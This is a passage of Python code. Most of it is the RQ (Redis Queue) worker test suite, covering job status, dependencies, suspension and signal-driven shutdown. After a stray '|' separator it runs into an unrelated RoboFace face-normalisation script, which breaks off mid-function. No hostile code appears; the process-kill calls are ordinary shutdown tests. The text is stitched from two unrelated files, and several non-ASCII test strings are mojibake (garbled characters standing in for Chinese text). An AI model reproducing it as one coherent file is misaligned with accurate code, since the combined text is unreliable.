    self.assertEqual(job.is_queued, False)
    self.assertEqual(job.is_finished, True)
    self.assertEqual(job.is_failed, False)
    # Failed jobs should set status to "failed"
    job = q.enqueue(div_by_zero, args=(1,))
    w.work(burst=True)
    job = Job.fetch(job.id)
    self.assertEqual(job.get_status(), JobStatus.FAILED)
    self.assertEqual(job.is_queued, False)
    self.assertEqual(job.is_finished, False)
    self.assertEqual(job.is_failed, True)
def test_job_dependency(self):
    """Enqueue dependent jobs only if their parents don't fail"""
    q = Queue()
    w = Worker([q])
    # Parent succeeds -> dependent job runs to FINISHED.
    parent_job = q.enqueue(say_hello, result_ttl=0)
    job = q.enqueue_call(say_hello, depends_on=parent_job)
    w.work(burst=True)
    job = Job.fetch(job.id)
    self.assertEqual(job.get_status(), JobStatus.FINISHED)
    # Parent fails -> dependent job must not reach FINISHED.
    parent_job = q.enqueue(div_by_zero)
    job = q.enqueue_call(say_hello, depends_on=parent_job)
    w.work(burst=True)
    job = Job.fetch(job.id)
    self.assertNotEqual(job.get_status(), JobStatus.FINISHED)
def test_get_current_job(self):
    """Ensure worker.get_current_job() works properly"""
    queue = Queue()
    w = Worker([queue])
    job = queue.enqueue_call(say_hello)
    # Nothing has been assigned to this worker yet.
    self.assertEqual(self.testconn.hget(w.key, 'current_job'), None)
    w.set_current_job_id(job.id)
    # The id reported by the worker must match what redis stores.
    self.assertEqual(
        w.get_current_job_id(),
        as_text(self.testconn.hget(w.key, 'current_job'))
    )
    self.assertEqual(w.get_current_job(), job)
def test_custom_job_class(self):
    """Ensure Worker accepts custom job class."""
    # The job_class kwarg should be reflected on the instance.
    worker = Worker([Queue()], job_class=CustomJob)
    self.assertEqual(worker.job_class, CustomJob)
def test_custom_queue_class(self):
    """Ensure Worker accepts custom queue class."""
    # The queue_class kwarg should be reflected on the instance.
    custom_queue = CustomQueue()
    worker = Worker([custom_queue], queue_class=CustomQueue)
    self.assertEqual(worker.queue_class, CustomQueue)
def test_custom_queue_class_is_not_global(self):
    """Ensure Worker custom queue class is not global."""
    custom_worker = Worker([CustomQueue()], queue_class=CustomQueue)
    plain_worker = Worker([Queue()])
    # The per-instance override must not leak to other instances,
    # nor to the Worker class itself.
    self.assertEqual(custom_worker.queue_class, CustomQueue)
    self.assertEqual(plain_worker.queue_class, Queue)
    self.assertEqual(Worker.queue_class, Queue)
def test_custom_job_class_is_not_global(self):
    """Ensure Worker custom job class is not global."""
    custom_worker = Worker([Queue()], job_class=CustomJob)
    plain_worker = Worker([Queue()])
    # The per-instance override must not leak to other instances,
    # nor to the Worker class itself.
    self.assertEqual(custom_worker.job_class, CustomJob)
    self.assertEqual(plain_worker.job_class, Job)
    self.assertEqual(Worker.job_class, Job)
def test_work_via_simpleworker(self):
    """Worker processes work, with forking disabled,
    then returns."""
    fooq, barq = Queue('foo'), Queue('bar')
    w = SimpleWorker([fooq, barq])
    self.assertEqual(w.work(burst=True), False,
                     'Did not expect any work on the queue.')
    job = fooq.enqueue(say_pid)
    self.assertEqual(w.work(burst=True), True,
                     'Expected at least some work done.')
    # SimpleWorker runs the job in-process, so it must report this
    # test process's own PID (no fork happened).
    self.assertEqual(job.result, os.getpid(),
                     'PID mismatch, fork() is not supposed to happen here')
def test_simpleworker_heartbeat_ttl(self):
    """SimpleWorker's key must last longer than job.timeout when working"""
    queue = Queue('foo')
    worker = SimpleWorker([queue])
    job_timeout = 300
    # save_key_ttl (tests.fixtures) presumably records the TTL of the
    # given key into job.meta['ttl'] — confirm against the fixture.
    job = queue.enqueue(save_key_ttl, worker.key, job_timeout=job_timeout)
    worker.work(burst=True)
    job.refresh()
    # Heartbeat TTL observed while working must outlive the job timeout.
    self.assertGreater(job.meta['ttl'], job_timeout)
def test_prepare_job_execution(self):
    """Prepare job execution does the necessary bookkeeping."""
    queue = Queue(connection=self.testconn)
    job = queue.enqueue(say_hello)
    worker = Worker([queue])
    worker.prepare_job_execution(job)
    # Updates working queue
    registry = StartedJobRegistry(connection=self.testconn)
    self.assertEqual(registry.get_job_ids(), [job.id])
    # Updates worker statuses
    self.assertEqual(worker.get_state(), 'busy')
    self.assertEqual(worker.get_current_job_id(), job.id)
    # job status is also updated
    self.assertEqual(job._status, JobStatus.STARTED)
    self.assertEqual(job.worker_name, worker.name)
def test_work_unicode_friendly(self):
    """Worker processes work with unicode description, then quits."""
    q = Queue('foo')
    w = Worker([q])
    # Non-ASCII description must round-trip through redis unchanged.
    job = q.enqueue('tests.fixtures.say_hello', name='Adam',
                    description='ไฝ ๅฅฝ ไธ็!')
    self.assertEqual(w.work(burst=True), True,
                     'Expected at least some work done.')
    self.assertEqual(job.result, 'Hi there, Adam!')
    self.assertEqual(job.description, 'ไฝ ๅฅฝ ไธ็!')
def test_work_log_unicode_friendly(self):
    """Worker process work with unicode or str other than pure ascii content,
    logging work properly"""
    q = Queue("foo")
    w = Worker([q])
    # Non-ASCII job name/description must not break the worker's logging.
    job = q.enqueue('tests.fixtures.say_hello', name='้ฟ่พพๅง',
                    description='ไฝ ๅฅฝ ไธ็!')
    w.work(burst=True)
    self.assertEqual(job.get_status(), JobStatus.FINISHED)
    # Same again with a fixture whose *return value* is unicode.
    job = q.enqueue('tests.fixtures.say_hello_unicode', name='้ฟ่พพๅง',
                    description='ไฝ ๅฅฝ ไธ็!')
    w.work(burst=True)
    self.assertEqual(job.get_status(), JobStatus.FINISHED)
def test_suspend_worker_execution(self):
    """Test Pause Worker Execution"""
    SENTINEL_FILE = '/tmp/rq-tests.txt'  # noqa
    try:
        # Remove the sentinel if it is leftover from a previous test run
        os.remove(SENTINEL_FILE)
    except OSError as e:
        # errno 2 == ENOENT: file was already absent, which is fine.
        if e.errno != 2:
            raise
    q = Queue()
    q.enqueue(create_file, SENTINEL_FILE)
    w = Worker([q])
    suspend(self.testconn)
    w.work(burst=True)
    # While suspended the burst must not consume the queue.
    assert q.count == 1
    # Should not have created evidence of execution
    self.assertEqual(os.path.exists(SENTINEL_FILE), False)
    resume(self.testconn)
    w.work(burst=True)
    # After resume, the job runs and creates the sentinel.
    assert q.count == 0
    self.assertEqual(os.path.exists(SENTINEL_FILE), True)
@slow
def test_suspend_with_duration(self):
    """Suspension with a TTL expires on its own and work resumes."""
    q = Queue()
    for _ in range(5):
        q.enqueue(do_nothing)
    w = Worker([q])
    # This suspends workers for working for 2 second
    suspend(self.testconn, 2)
    # So when this burst of work happens the queue should remain at 5
    w.work(burst=True)
    assert q.count == 5
    # Sleep past the suspension TTL (2s) with margin.
    sleep(3)
    # The suspension should be expired now, and a burst of work should now clear the queue
    w.work(burst=True)
    assert q.count == 0
def test_worker_hash_(self):
    """Workers are hashed by their .name attribute"""
    queue = Queue('foo')
    first = Worker([queue], name="worker1")
    second = Worker([queue], name="worker2")
    duplicate = Worker([queue], name="worker1")  # same name as `first`
    # Equal names hash equal, so the set collapses to two entries.
    self.assertEqual(len({first, second, duplicate}), 2)
def test_worker_sets_birth(self):
    """Ensure worker correctly sets worker birth date."""
    q = Queue()
    w = Worker([q])
    w.register_birth()
    birth_date = w.birth_date
    self.assertIsNotNone(birth_date)
    # Assert the type directly instead of comparing the type name as a
    # string — consistent with test_worker_sets_death below.
    self.assertIsInstance(birth_date, datetime)
def test_worker_sets_death(self):
    """Ensure worker correctly sets worker death date."""
    worker = Worker([Queue()])
    worker.register_death()
    # register_death must record a concrete datetime.
    recorded = worker.death_date
    self.assertIsNotNone(recorded)
    self.assertIsInstance(recorded, datetime)
def test_clean_queue_registries(self):
    """worker.clean_registries sets last_cleaned_at and cleans registries."""
    foo_queue = Queue('foo', connection=self.testconn)
    foo_registry = StartedJobRegistry('foo', connection=self.testconn)
    # Plant a stale entry (score 1 == long expired) in each registry.
    self.testconn.zadd(foo_registry.key, {'foo': 1})
    self.assertEqual(self.testconn.zcard(foo_registry.key), 1)
    bar_queue = Queue('bar', connection=self.testconn)
    bar_registry = StartedJobRegistry('bar', connection=self.testconn)
    self.testconn.zadd(bar_registry.key, {'bar': 1})
    self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
    worker = Worker([foo_queue, bar_queue])
    self.assertEqual(worker.last_cleaned_at, None)
    worker.clean_registries()
    self.assertNotEqual(worker.last_cleaned_at, None)
    # Both queues' registries were swept.
    self.assertEqual(self.testconn.zcard(foo_registry.key), 0)
    self.assertEqual(self.testconn.zcard(bar_registry.key), 0)
    # worker.clean_registries() only runs once every 15 minutes
    # If we add another key, calling clean_registries() should do nothing
    self.testconn.zadd(bar_registry.key, {'bar': 1})
    worker.clean_registries()
    self.assertEqual(self.testconn.zcard(bar_registry.key), 1)
def test_should_run_maintenance_tasks(self):
    """Workers should run maintenance tasks on startup and every hour."""
    q = Queue(connection=self.testconn)
    w = Worker(q)
    self.assertTrue(w.should_run_maintenance_tasks)   # never cleaned: due
    w.last_cleaned_at = utcnow()                      # cleaned just now: not due
    self.assertFalse(w.should_run_maintenance_tasks)
    w.last_cleaned_at = utcnow() - timedelta(seconds=3700)  # > 1 hour ago: due
    self.assertTrue(w.should_run_maintenance_tasks)
def test_worker_calls_clean_registries(self):
    """Worker calls clean_registries when run."""
    queue = Queue(connection=self.testconn)
    registry = StartedJobRegistry(connection=self.testconn)
    # Plant a stale entry; a working worker must sweep it on startup.
    self.testconn.zadd(registry.key, {'foo': 1})
    worker = Worker(queue, connection=self.testconn)
    worker.work(burst=True)
    self.assertEqual(self.testconn.zcard(registry.key), 0)
def test_job_dependency_race_condition(self):
    """Dependencies added while the job gets finished shouldn't get lost."""
    # This patches the enqueue_dependents to enqueue a new dependency AFTER
    # the original code was executed.
    # NOTE(review): the patch is applied to the Queue class and never
    # restored — it leaks into later tests in the same process; confirm
    # whether that is acceptable here.
    orig_enqueue_dependents = Queue.enqueue_dependents

    def new_enqueue_dependents(self, job, *args, **kwargs):
        orig_enqueue_dependents(self, job, *args, **kwargs)
        # Inject exactly one extra dependent, the first time the marked
        # parent job has its dependents enqueued.
        if hasattr(Queue, '_add_enqueue') and Queue._add_enqueue is not None and Queue._add_enqueue.id == job.id:
            Queue._add_enqueue = None
            Queue().enqueue_call(say_hello, depends_on=job)

    Queue.enqueue_dependents = new_enqueue_dependents
    q = Queue()
    w = Worker([q])
    with mock.patch.object(Worker, 'execute_job', wraps=w.execute_job) as mocked:
        parent_job = q.enqueue(say_hello, result_ttl=0)
        Queue._add_enqueue = parent_job
        job = q.enqueue_call(say_hello, depends_on=parent_job)
        w.work(burst=True)
        job = Job.fetch(job.id)
        self.assertEqual(job.get_status(), JobStatus.FINISHED)
    # The created spy checks two issues:
    # * before the fix of #739, 2 of the 3 jobs where executed due
    #   to the race condition
    # * during the development another issue was fixed:
    #   due to a missing pipeline usage in Queue.enqueue_job, the job
    #   which was enqueued before the "rollback" was executed twice.
    #   So before that fix the call count was 4 instead of 3
    self.assertEqual(mocked.call_count, 3)
def test_self_modification_persistence(self):
    """Make sure that any meta modification done by
    the job itself persists completely through the
    queue/worker/job stack."""
    q = Queue()
    # Also make sure that previously existing metadata
    # persists properly
    job = q.enqueue(modify_self, meta={'foo': 'bar', 'baz': 42},
                    args=[{'baz': 10, 'newinfo': 'waka'}])
    w = Worker([q])
    w.work(burst=True)
    job_check = Job.fetch(job.id)
    # 'foo' untouched, 'baz' overwritten by the job, 'newinfo' added.
    self.assertEqual(job_check.meta['foo'], 'bar')
    self.assertEqual(job_check.meta['baz'], 10)
    self.assertEqual(job_check.meta['newinfo'], 'waka')
def test_self_modification_persistence_with_error(self):
    """Make sure that any meta modification done by
    the job itself persists completely through the
    queue/worker/job stack -- even if the job errored"""
    q = Queue()
    # Also make sure that previously existing metadata
    # persists properly
    job = q.enqueue(modify_self_and_error, meta={'foo': 'bar', 'baz': 42},
                    args=[{'baz': 10, 'newinfo': 'waka'}])
    w = Worker([q])
    w.work(burst=True)
    # Postconditions
    self.assertEqual(q.count, 0)
    failed_job_registry = FailedJobRegistry(queue=q)
    self.assertTrue(job in failed_job_registry)
    self.assertEqual(w.get_current_job_id(), None)
    job_check = Job.fetch(job.id)
    # Meta written before the error must still be persisted.
    self.assertEqual(job_check.meta['foo'], 'bar')
    self.assertEqual(job_check.meta['baz'], 10)
    self.assertEqual(job_check.meta['newinfo'], 'waka')
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_true(self, mock_logger_info):
    """Check that log_result_lifespan True causes job lifespan to be logged."""
    q = Queue()
    w = Worker([q])
    job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
    w.perform_job(job, q)
    # Checks both the most recent call and membership in the full call list.
    mock_logger_info.assert_called_with('Result is kept for %s seconds', 10)
    self.assertIn('Result is kept for %s seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_result_lifespan_false(self, mock_logger_info):
    """Check that log_result_lifespan False causes job lifespan to not be logged."""
    q = Queue()

    class TestWorker(Worker):
        # Subclass toggles the flag under test.
        log_result_lifespan = False

    w = TestWorker([q])
    job = q.enqueue(say_hello, args=('Frank',), result_ttl=10)
    w.perform_job(job, q)
    # No lifespan message should appear anywhere in the logged calls.
    self.assertNotIn('Result is kept for 10 seconds', [c[0][0] for c in mock_logger_info.call_args_list])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_true(self, mock_logger_info):
    """Check that log_job_description True causes job lifespan to be logged."""
    q = Queue()
    w = Worker([q])
    q.enqueue(say_hello, args=('Frank',), result_ttl=10)
    w.dequeue_job_and_maintain_ttl(10)
    # The job description (containing the argument) is the third log arg.
    self.assertIn("Frank", mock_logger_info.call_args[0][2])
@mock.patch('rq.worker.logger.info')
def test_log_job_description_false(self, mock_logger_info):
    """Check that log_job_description False causes job lifespan to not be logged."""
    q = Queue()
    w = Worker([q], log_job_description=False)
    q.enqueue(say_hello, args=('Frank',), result_ttl=10)
    w.dequeue_job_and_maintain_ttl(10)
    # With the flag off, the description must be absent from the log args.
    self.assertNotIn("Frank", mock_logger_info.call_args[0][2])
def test_worker_version(self):
    """Worker.version survives registration, refresh and key lookup."""
    q = Queue()
    w = Worker([q])
    w.version = '0.0.0'
    w.register_birth()
    self.assertEqual(w.version, '0.0.0')
    # refresh() reloads the worker's state from redis; version must survive.
    w.refresh()
    self.assertEqual(w.version, '0.0.0')
    # making sure that version is preserved when worker is retrieved by key
    worker = Worker.find_by_key(w.key)
    self.assertEqual(worker.version, '0.0.0')
def test_python_version(self):
    """Worker records the interpreter version and preserves overrides."""
    python_version = sys.version
    q = Queue()
    w = Worker([q])
    w.register_birth()
    # Default: the worker reports the running interpreter's version.
    self.assertEqual(w.python_version, python_version)
    # now patching version
    python_version = 'X.Y.Z.final'  # dummy version
    self.assertNotEqual(python_version, sys.version)  # otherwise tests are pointless
    w2 = Worker([q])
    w2.python_version = python_version
    w2.register_birth()
    self.assertEqual(w2.python_version, python_version)
    # making sure that version is preserved when worker is retrieved by key
    worker = Worker.find_by_key(w2.key)
    self.assertEqual(worker.python_version, python_version)
def wait_and_kill_work_horse(pid, time_to_wait=0.0):
    """Sleep for ``time_to_wait`` seconds, then SIGKILL process ``pid``.

    Run in a helper Process to simulate a work horse dying mid-job.
    """
    time.sleep(time_to_wait)
    os.kill(pid, signal.SIGKILL)
class TimeoutTestCase:
    """Mixin that aborts a test with AssertionError if it runs too long.

    Guards the shutdown tests: if signals are ignored and a worker keeps
    running, SIGALRM fires after ``killtimeout`` seconds and fails the test.
    """

    def setUp(self):
        # we want tests to fail if signal are ignored and the work remain
        # running, so set a signal to kill them after X seconds
        self.killtimeout = 15
        signal.signal(signal.SIGALRM, self._timeout)
        signal.alarm(self.killtimeout)

    def _timeout(self, signum, frame):
        # `signum` renamed from `signal` to avoid shadowing the signal module.
        raise AssertionError(
            "test still running after %i seconds, likely the worker wasn't shutdown correctly" % self.killtimeout
        )
class WorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
    """SIGTERM handling: warm/cold shutdown and unexpected work-horse death."""

    @slow
    def test_idle_worker_warm_shutdown(self):
        """worker with no ongoing job receiving single SIGTERM signal and shutting down"""
        w = Worker('foo')
        self.assertFalse(w._stop_requested)
        # kill_worker (fixture) signals this process from a child —
        # presumably a single SIGTERM; see tests.fixtures.
        p = Process(target=kill_worker, args=(os.getpid(), False))
        p.start()
        w.work()
        p.join(1)
        # An idle worker exits without ever flagging a stop request.
        self.assertFalse(w._stop_requested)

    @slow
    def test_working_worker_warm_shutdown(self):
        """worker with an ongoing job receiving single SIGTERM signal, allowing job to finish then shutting down"""
        fooq = Queue('foo')
        w = Worker(fooq)
        sentinel_file = '/tmp/.rq_sentinel_warm'
        fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
        self.assertFalse(w._stop_requested)
        p = Process(target=kill_worker, args=(os.getpid(), False))
        p.start()
        w.work()
        p.join(2)
        self.assertFalse(p.is_alive())
        self.assertTrue(w._stop_requested)
        # Warm shutdown let the in-flight job finish: sentinel exists.
        self.assertTrue(os.path.exists(sentinel_file))
        self.assertIsNotNone(w.shutdown_requested_date)
        self.assertEqual(type(w.shutdown_requested_date).__name__, 'datetime')

    @slow
    def test_working_worker_cold_shutdown(self):
        """Busy worker shuts down immediately on double SIGTERM signal"""
        fooq = Queue('foo')
        w = Worker(fooq)
        sentinel_file = '/tmp/.rq_sentinel_cold'
        fooq.enqueue(create_file_after_timeout, sentinel_file, 2)
        self.assertFalse(w._stop_requested)
        p = Process(target=kill_worker, args=(os.getpid(), True))
        p.start()
        self.assertRaises(SystemExit, w.work)
        p.join(1)
        self.assertTrue(w._stop_requested)
        # Cold shutdown aborts the job, so the sentinel never appears.
        self.assertFalse(os.path.exists(sentinel_file))
        shutdown_requested_date = w.shutdown_requested_date
        self.assertIsNotNone(shutdown_requested_date)
        self.assertEqual(type(shutdown_requested_date).__name__, 'datetime')

    @slow
    def test_work_horse_death_sets_job_failed(self):
        """worker with an ongoing job whose work horse dies unexpectadly (before
        completing the job) should set the job's status to FAILED
        """
        fooq = Queue('foo')
        self.assertEqual(fooq.count, 0)
        w = Worker(fooq)
        sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
        if os.path.exists(sentinel_file):
            os.remove(sentinel_file)
        fooq.enqueue(create_file_after_timeout, sentinel_file, 100)
        job, queue = w.dequeue_job_and_maintain_ttl(5)
        w.fork_work_horse(job, queue)
        # SIGKILL the horse shortly after it forks, mid-job.
        p = Process(target=wait_and_kill_work_horse, args=(w._horse_pid, 0.5))
        p.start()
        w.monitor_work_horse(job, queue)
        job_status = job.get_status()
        p.join(1)
        self.assertEqual(job_status, JobStatus.FAILED)
        failed_job_registry = FailedJobRegistry(queue=fooq)
        self.assertTrue(job in failed_job_registry)
        self.assertEqual(fooq.count, 0)

    @slow
    def test_work_horse_force_death(self):
        """Simulate a frozen worker that doesn't observe the timeout properly.
        Fake it by artificially setting the timeout of the parent process to
        something much smaller after the process is already forked.
        """
        fooq = Queue('foo')
        self.assertEqual(fooq.count, 0)
        w = Worker(fooq)
        sentinel_file = '/tmp/.rq_sentinel_work_horse_death'
        if os.path.exists(sentinel_file):
            os.remove(sentinel_file)
        # The fixture writes the PID of a grandchild process to the sentinel.
        fooq.enqueue(launch_process_within_worker_and_store_pid, sentinel_file, 100)
        job, queue = w.dequeue_job_and_maintain_ttl(5)
        w.fork_work_horse(job, queue)
        # Shrink the timeout only after forking, so the parent must
        # force-kill the (now over-budget) horse.
        job.timeout = 5
        w.job_monitoring_interval = 1
        now = utcnow()
        time.sleep(1)
        with open(sentinel_file) as f:
            subprocess_pid = int(f.read().strip())
        self.assertTrue(psutil.pid_exists(subprocess_pid))
        w.monitor_work_horse(job, queue)
        fudge_factor = 1
        total_time = w.job_monitoring_interval + 65 + fudge_factor
        # Monitoring must give up well before the original 100s job budget.
        self.assertTrue((utcnow() - now).total_seconds() < total_time)
        self.assertEqual(job.get_status(), JobStatus.FAILED)
        failed_job_registry = FailedJobRegistry(queue=fooq)
        self.assertTrue(job in failed_job_registry)
        self.assertEqual(fooq.count, 0)
        # The grandchild process must have been cleaned up as well.
        self.assertFalse(psutil.pid_exists(subprocess_pid))
def schedule_access_self():
    """Job fixture: enqueue ``access_self`` on the default queue.

    Used to test jobs that themselves enqueue further jobs.
    """
    q = Queue('default', connection=get_current_connection())
    q.enqueue(access_self)
@pytest.mark.skipif(sys.platform == 'darwin', reason='Fails on OS X')
class TestWorkerSubprocess(RQTestCase):
    """End-to-end tests running the real ``rqworker`` CLI as a subprocess."""

    def setUp(self):
        super(TestWorkerSubprocess, self).setUp()
        # Point the CLI at the same redis database the test fixtures use.
        db_num = self.testconn.connection_pool.connection_kwargs['db']
        self.redis_url = 'redis://127.0.0.1:6379/%d' % db_num

    def test_run_empty_queue(self):
        """Run the worker in its own process with an empty queue"""
        # -b = burst mode: exit as soon as the queue is drained.
        subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])

    def test_run_access_self(self):
        """Schedule a job, then run the worker as subprocess"""
        q = Queue()
        job = q.enqueue(access_self)
        subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
        registry = FinishedJobRegistry(queue=q)
        self.assertTrue(job in registry)
        assert q.count == 0

    @skipIf('pypy' in sys.version.lower(), 'often times out with pypy')
    def test_run_scheduled_access_self(self):
        """Schedule a job that schedules a job, then run the worker as subprocess"""
        q = Queue()
        job = q.enqueue(schedule_access_self)
        subprocess.check_call(['rqworker', '-u', self.redis_url, '-b'])
        registry = FinishedJobRegistry(queue=q)
        self.assertTrue(job in registry)
        assert q.count == 0
@pytest.mark.skipif(sys.platform == 'darwin', reason='requires Linux signals')
@skipIf('pypy' in sys.version.lower(), 'these tests often fail on pypy')
class HerokuWorkerShutdownTestCase(TimeoutTestCase, RQTestCase):
    """HerokuWorker SIGRTMIN-driven shutdown behaviour."""

    def setUp(self):
        super(HerokuWorkerShutdownTestCase, self).setUp()
        # Scratch dir where the dummy worker drops 'started'/'finished' markers.
        self.sandbox = '/tmp/rq_shutdown/'
        os.makedirs(self.sandbox)

    def tearDown(self):
        shutil.rmtree(self.sandbox, ignore_errors=True)

    @slow
    def test_immediate_shutdown(self):
        """Heroku work horse shutdown with immediate (0 second) kill"""
        p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 0))
        p.start()
        time.sleep(0.5)
        os.kill(p.pid, signal.SIGRTMIN)
        p.join(2)
        self.assertEqual(p.exitcode, 1)
        # Job started but was interrupted before finishing.
        self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
        self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))

    @slow
    def test_1_sec_shutdown(self):
        """Heroku work horse shutdown with 1 second kill"""
        p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 1))
        p.start()
        time.sleep(0.5)
        os.kill(p.pid, signal.SIGRTMIN)
        time.sleep(0.1)
        # Still alive during the 1s grace period.
        self.assertEqual(p.exitcode, None)
        p.join(2)
        self.assertEqual(p.exitcode, 1)
        self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
        self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))

    @slow
    def test_shutdown_double_sigrtmin(self):
        """Heroku work horse shutdown with long delay but SIGRTMIN sent twice"""
        p = Process(target=run_dummy_heroku_worker, args=(self.sandbox, 10))
        p.start()
        time.sleep(0.5)
        os.kill(p.pid, signal.SIGRTMIN)
        # we have to wait a short while otherwise the second signal wont bet processed.
        time.sleep(0.1)
        os.kill(p.pid, signal.SIGRTMIN)
        p.join(2)
        self.assertEqual(p.exitcode, 1)
        self.assertTrue(os.path.exists(os.path.join(self.sandbox, 'started')))
        self.assertFalse(os.path.exists(os.path.join(self.sandbox, 'finished')))

    @mock.patch('rq.worker.logger.info')
    def test_handle_shutdown_request(self, mock_logger_info):
        """Mutate HerokuWorker so _horse_pid refers to an artificial process
        and test handle_warm_shutdown_request"""
        w = HerokuWorker('foo')
        path = os.path.join(self.sandbox, 'shouldnt_exist')
        p = Process(target=create_file_after_timeout_and_setsid, args=(path, 2))
        p.start()
        self.assertEqual(p.exitcode, None)
        time.sleep(0.1)
        w._horse_pid = p.pid
        w.handle_warm_shutdown_request()
        p.join(2)
        # would expect p.exitcode to be -34
        self.assertEqual(p.exitcode, -34)
        # Killed before it could create the file.
        self.assertFalse(os.path.exists(path))
        mock_logger_info.assert_called_with('Killed horse pid %s', p.pid)

    def test_handle_shutdown_request_no_horse(self):
        """Mutate HerokuWorker so _horse_pid refers to non existent process
        and test handle_warm_shutdown_request"""
        w = HerokuWorker('foo')
        w._horse_pid = 19999
        # Must not raise even though the pid does not exist.
        w.handle_warm_shutdown_request()
class TestExceptionHandlerMessageEncoding(RQTestCase):
    """worker.handle_exception must cope with non-ASCII exception messages."""

    def setUp(self):
        super(TestExceptionHandlerMessageEncoding, self).setUp()
        self.worker = Worker("foo")
        self.worker._exc_handlers = []
        # Mimic how exception info is actually passed forwards
        try:
            raise Exception(u"๐ช")
        except Exception:
            self.exc_info = sys.exc_info()

    def test_handle_exception_handles_non_ascii_in_exception_message(self):
        """worker.handle_exception doesn't crash on non-ascii in exception message."""
        self.worker.handle_exception(Mock(), *self.exc_info)
class TestRoundRobinWorker(RQTestCase):
    """RoundRobinWorker must take one job from each queue in turn."""

    def test_round_robin(self):
        # 5 queues x 3 jobs; job ids encode (queue, position).
        qs = [Queue('q%d' % i) for i in range(5)]
        for i in range(5):
            for j in range(3):
                qs[i].enqueue(say_pid,
                              job_id='q%d_%d' % (i, j))
        w = RoundRobinWorker(qs)
        w.work(burst=True)
        start_times = []
        for i in range(5):
            for j in range(3):
                job = Job.fetch('q%d_%d' % (i, j))
                start_times.append(('q%d_%d' % (i, j), job.started_at))
        # Order jobs by when they actually started and compare against the
        # expected round-robin interleaving (first job of every queue, then
        # second of every queue, ...).
        sorted_by_time = sorted(start_times, key=lambda tup: tup[1])
        sorted_ids = [tup[0] for tup in sorted_by_time]
        expected = ['q0_0', 'q1_0', 'q2_0', 'q3_0', 'q4_0',
                    'q0_1', 'q1_1', 'q2_1', 'q3_1', 'q4_1',
                    'q0_2', 'q1_2', 'q2_2', 'q3_2', 'q4_2']
        self.assertEqual(expected, sorted_ids)
class TestRandomWorker(RQTestCase):
    """RandomWorker should dequeue in an order that matches no fixed scheme."""

    def test_random_worker(self):
        # 5 queues x 3 jobs; job ids encode (queue, position).
        qs = [Queue('q%d' % i) for i in range(5)]
        for i in range(5):
            for j in range(3):
                qs[i].enqueue(say_pid,
                              job_id='q%d_%d' % (i, j))
        w = RandomWorker(qs)
        w.work(burst=True)
        start_times = []
        for i in range(5):
            for j in range(3):
                job = Job.fetch('q%d_%d' % (i, j))
                start_times.append(('q%d_%d' % (i, j), job.started_at))
        sorted_by_time = sorted(start_times, key=lambda tup: tup[1])
        sorted_ids = [tup[0] for tup in sorted_by_time]
        # NOTE(review): these inequality checks are probabilistic — a random
        # order *could* coincide with round-robin/serial (or their reverses)
        # with tiny probability, making the test flaky in theory.
        expected_rr = ['q%d_%d' % (i, j) for j in range(3) for i in range(5)]
        expected_ser = ['q%d_%d' % (i, j) for i in range(5) for j in range(3)]
        self.assertNotEqual(sorted_ids, expected_rr)
        self.assertNotEqual(sorted_ids, expected_ser)
        expected_rr.reverse()
        expected_ser.reverse()
        self.assertNotEqual(sorted_ids, expected_rr)
        self.assertNotEqual(sorted_ids, expected_ser)
        # Sanity check: the same 15 job ids were executed, just reordered.
        sorted_ids.sort()
        expected_ser.sort()
        self.assertEqual(sorted_ids, expected_ser)
|
run2017.py | # -*- coding: utf-8 -*-
"""
Running the trained neural network, normalise image and control RoboFace.
Copyright (C) 2017 Letitia Parcalabescu
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import cv2
import numpy as np
from keras.models import load_model
# from scipy import misc
from scipy.misc import imresize
from skimage.transform import resize, rotate
import h5py
import math
import face
from gtts import gTTS
from pygame import mixer, time
import os, subprocess, signal, psutil
from threading import Thread, Event
from time import sleep, time
from scipy.io import wavfile
from scipy.ndimage.filters import maximum_filter1d,gaussian_filter
from nltk.tokenize import sent_tokenize
import string
# Input size (height, width) expected by the trained network; used by
# normaliseImage's final resize.
IMAGE_SIZE = (128, 128)
# Target inter-ocular distance (pixels) that faces are scaled to.
IOD = 40.0
def imgCrop(image, cropBox, boxScale=1):
    '''
    Crop an area around the detected face (by OpenCV) in order to feed it
    into the prediction algorithm (NN).

    image    -- full frame as a numpy array, indexed [row, col].
    cropBox  -- (x, y, w, h) face rectangle from cv2.detectMultiScale.
    boxScale -- unused; kept for interface compatibility.

    Returns (cropped, x, y) where (x, y) is the top-left corner of the
    crop within the original image.
    '''
    # The original ran three max() passes with offsets 90/50/20; each later
    # bound is larger, so only the last pass (off=20 -> -60/-40) and the
    # clamp to 0 ever take effect.  This is the collapsed equivalent.
    y = max(cropBox[1] - 60, 0)
    x = max(cropBox[0] - 40, 0)
    cropped = image[y:cropBox[1] + cropBox[3] + 90, x:cropBox[0] + cropBox[2] + 30]
    return cropped, x, y
def rotateBound(image, angle, center):
    '''
    Rotates image. Used for image normalisation, so that the inter-ocular line is always horizontal for the NN.

    Rotates `image` by `angle` (degrees, per cv2.getRotationMatrix2D) about
    `center` = (cX, cY), enlarging the canvas so no pixels are clipped.
    '''
    (cX, cY) = center
    (h, w) = image.shape[:2]
    # grab the rotation matrix (applying the negative of the
    # angle to rotate clockwise), then grab the sine and cosine
    # (i.e., the rotation components of the matrix)
    M = cv2.getRotationMatrix2D((cX, cY), -angle, 1.0)
